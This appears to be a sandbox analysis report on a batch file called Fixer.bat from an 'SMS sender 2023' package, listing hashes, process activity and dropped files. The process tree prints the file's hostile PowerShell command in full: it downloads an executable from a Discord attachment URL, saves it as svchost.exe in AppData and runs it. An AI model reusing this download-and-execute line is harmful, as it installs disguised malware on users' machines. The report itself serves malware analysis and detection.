920ee4d6e16da14af70de3df554004024590cd31ac4b57c5338761b7838b3291

Resubmissions

02/02/2024, 15:59

240202-te4t8scbdp 10

02/02/2024, 15:54

240202-tcesbscahk 10

Analysis

max time kernel
92s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
02/02/2024, 15:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SMS sender 2023/SMS sender 2023/Fixer.bat
Size

2KB
MD5

f270d92aa6bc1f8e856de4671e0d8e11
SHA1

18f9bd65e741b75e46bb3bf5574043a619148138
SHA256

bc1d78f54d3aedc89745d2703cdc78d89a852d930d180088a85f212683ecb5f7
SHA512

ec90fa4d06c843d252aef4c816175a6c9cf03de8f1e900bf529147da1398561c71099d24d52cef5122e0c0812216a37d17d7b9f27f7fd05c073ddf21a7f1dd5f

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfh007.dat	lodctr.exe
File created	C:\Windows\system32\perfh009.dat	lodctr.exe
File created	C:\Windows\system32\perfh00C.dat	lodctr.exe
File created	C:\Windows\system32\perfh010.dat	lodctr.exe
File created	C:\Windows\system32\perfc007.dat	lodctr.exe
File created	C:\Windows\system32\perfc00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh00A.dat	lodctr.exe
File created	C:\Windows\system32\perfc00C.dat	lodctr.exe
File created	C:\Windows\system32\perfc010.dat	lodctr.exe
File created	C:\Windows\system32\perfc011.dat	lodctr.exe
File created	C:\Windows\system32\perfh011.dat	lodctr.exe
File created	C:\Windows\system32\perfc009.dat	lodctr.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3036	powershell.exe
3036	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3036	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4704 wrote to memory of 4224	4704	cmd.exe	88
PID 4704 wrote to memory of 4224	4704	cmd.exe	88
PID 4704 wrote to memory of 3036	4704	cmd.exe	90
PID 4704 wrote to memory of 3036	4704	cmd.exe	90
PID 4704 wrote to memory of 2572	4704	cmd.exe	100
PID 4704 wrote to memory of 2572	4704	cmd.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SMS sender 2023\SMS sender 2023\Fixer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4704
- C:\Windows\system32\mode.com
  MODE CON COLS=30 LINES=2
  2⤵
  PID:4224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C start-BitsTransfer -priority foreground -Source https://cdn.discordapp.com/attachments/711838517176696884/904872660025094164/Requieremnts.exe -Destination $Env:appdata/svchost.exe -ErrorAction SilentlyContinue;sleep 7;start $Env:appdata/svchost.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3036
- C:\Windows\system32\lodctr.exe
  lodctr /r
  2⤵
  - Drops file in System32 directory
  PID:2572

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u4vwsnex.z2q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\perfc007.dat

Filesize
44KB

MD5
4310cecf3a73920ecaa4d6414ab07f68

SHA1
1694d9ac571d38a1e3e590ecfa85ca7428770be2

SHA256
869bb41741bd8d256c97ddd08833ec24f6b3a2f5c45c99fae161b46377d3b99c

SHA512
a120f7ef2118118e0255e6867204829766676e255631b69035f63fc640d48a8482b3e4f338ff9d4211dc25858d0f319bf28eb37f3c4d46788f35858b35a72371

Download Submit
C:\Windows\System32\perfc00A.dat

Filesize
51KB

MD5
95b42a407ff7a7e65efec3ffa79e9a12

SHA1
1bfb1604ae8b8c2bd894b58de2f7acc32292b4c4

SHA256
104db4623577501241479cddb8f2908d89f275aad97d2b4367e33baf022a0c65

SHA512
97449425f7c9cce831bd98426562084d432c484bc66261c3336370e9aba6283666c5cc3fee436658415001f7cfe316e2f69d44bcb9c714350f77e36da52e1901

Download Submit
C:\Windows\System32\perfc00C.dat

Filesize
43KB

MD5
8b4b53cf469919a32481ce37bcce203a

SHA1
58ee96630adf29e79771bfc39a400a486b4efbb0

SHA256
a7b3a2b6c67e98cf2b13684c8774113c4ed4f60cd6fc673d4c9dcb360c60ce42

SHA512
62217e68c9e4c7b077e127040318c603e2f2cbcc5517ce0cfc6189e43023f8d8a05b8e694b2a35d4b409241136a1067749b7b6e2049d6910246d8c0fa6e9e575

Download Submit
C:\Windows\System32\perfc010.dat

Filesize
46KB

MD5
9c127d90b405f6e4e98e60bb83285a93

SHA1
358b36827fb8dbfd9f268d7278961ae3309baaa1

SHA256
878a012b076c81d7b46068109d9b9e1a86aa8527d87d0baee47b59b07502c578

SHA512
bd80bb82e6f2375107153b7da67ce4a3ab3d457103a8371f93e130edece21791d8a716ab9793b74c6b5ab10166ccb52aee430bc4b63403b7e4749d7db9929e73

Download Submit
C:\Windows\System32\perfc011.dat

Filesize
32KB

MD5
50681b748a019d0096b5df4ebe1eab74

SHA1
0fa741b445f16f05a1984813c7b07cc66097e180

SHA256
33295c7ee1b56a41e809432bc25dd745ba55b2dc91bfa97aa1f55156880cd71a

SHA512
568439b3547dcbcce28499d45663fdd0e2222f6c5c90053769ce2585f65721f679c071393328bde72c9a3f03da4c17abb84b8303897688b59598887ceb31438e

Download Submit
C:\Windows\System32\perfh007.dat

Filesize
320KB

MD5
b9a5000ea316ac348cf77beb0e5bc379

SHA1
4e666af14169eb10a0a08ac2f5ed5ecf4764df46

SHA256
1b25a6879c667258cdb900683004ef007c6b3a1a933d823b124d9a6acf9de608

SHA512
9fd911586a0aebec11c48e9f78de3b3f6e41c98a2770f5ac10d0a3947b4b3f326a8c5028c478c8634fb84a071186606e69a7aff83b1cf972d4728e3923503118

Download Submit
C:\Windows\System32\perfh009.dat

Filesize
312KB

MD5
367662b55faba4e0728f3c296daa92a7

SHA1
1775899bd0f1bb5cf945910db18aa3a9d4d15b7a

SHA256
c2ea1af1c970468f522e354c8e47b121b66a0d0428a8400f4a5cb03216368ce1

SHA512
283e9cf2bf6fe904b530bd188347641c1d30b27c95d89552e18aa33be1c7e2840f10a09868a2862ee53bb805cef2cdbb31b8db391ca140b5dda27058dcad11ce

Download Submit
C:\Windows\System32\perfh00A.dat

Filesize
360KB

MD5
1402add2a611322eb6f624705c8a9a4e

SHA1
d08b0b5e602d4587e534cf5e9c3d04c549a5aa47

SHA256
0ac43c8e77edb2c1468420653fc5d505b26cdc4da06c4121ce4bbecae561e6cb

SHA512
177d5ea7e77eee154042b5e064db67a5cac9435890a2ff65cd98da21433f4e7de743e9df22ac0ac61be89fc0be8655b46454ed4a930d13fc7c1dfebe5896781f

Download Submit
C:\Windows\System32\perfh00C.dat

Filesize
363KB

MD5
d0a8d13996333367f0e1721ca8658e00

SHA1
f48f432c5a0d3c425961e6ed6291ddb0f4b5a116

SHA256
68a7924621a0fbc13d0ea151617d13732a991cef944aae67d44fc030740a82e9

SHA512
8a68c62b5fc983975d010ae6504a1cbfdf34d5656e3277d9a09eb92929e201e27ca7bd2030740c8240a4afd56af57c223b4fd6de193bedf84ac7238777310de4

Download Submit
C:\Windows\System32\perfh010.dat

Filesize
353KB

MD5
a5389200f9bbc7be1276d74ccd2939b4

SHA1
8d6f17c7d36f686e727b6e7b3a62812297228943

SHA256
494db162e2ccd95e69404a34170b6e59847f444881834f3c175c6bc70d783087

SHA512
fc1d1e81362d186410b4af3d6add3c8b32fdd75ea79b7e868cc16615358264af04f47170229d32dffcbf7e1ba2b841ccd2d4f27b0f8d82a0685806c22d3d0a92

Download Submit
C:\Windows\System32\perfh011.dat

Filesize
159KB

MD5
394e68a48cbedf2aa4290ad4be6c1254

SHA1
e9b5a4204bedd201adfee94cd4bd475f92d508a0

SHA256
48dbdc9f160e51c14f7cf0f4f31856fc5c51bb5a157eefc9159612227def9d88

SHA512
5b3ebefb252a4ea2b5504fdb79fba35f256ee544df6385eeb47a05be4eddd41063fe9a025d5e8393d34cc34abd431810b5c5cc21c777316200c9cfa769fcfd6c

Download Submit
memory/3036-19-0x00007FFF93ED0000-0x00007FFF94991000-memory.dmp

Filesize
10.8MB

Download
memory/3036-16-0x000002114A350000-0x000002114A360000-memory.dmp

Filesize
64KB

Download
memory/3036-15-0x000002114A350000-0x000002114A360000-memory.dmp

Filesize
64KB

Download
memory/3036-14-0x0000021164BD0000-0x0000021164BE4000-memory.dmp

Filesize
80KB

Download
memory/3036-13-0x0000021164960000-0x0000021164986000-memory.dmp

Filesize
152KB

Download
memory/3036-12-0x000002114A350000-0x000002114A360000-memory.dmp

Filesize
64KB

Download
memory/3036-11-0x000002114A350000-0x000002114A360000-memory.dmp

Filesize
64KB

Download
memory/3036-10-0x00007FFF93ED0000-0x00007FFF94991000-memory.dmp

Filesize
10.8MB

Download
memory/3036-9-0x00000211647F0000-0x0000021164812000-memory.dmp

Filesize
136KB

Download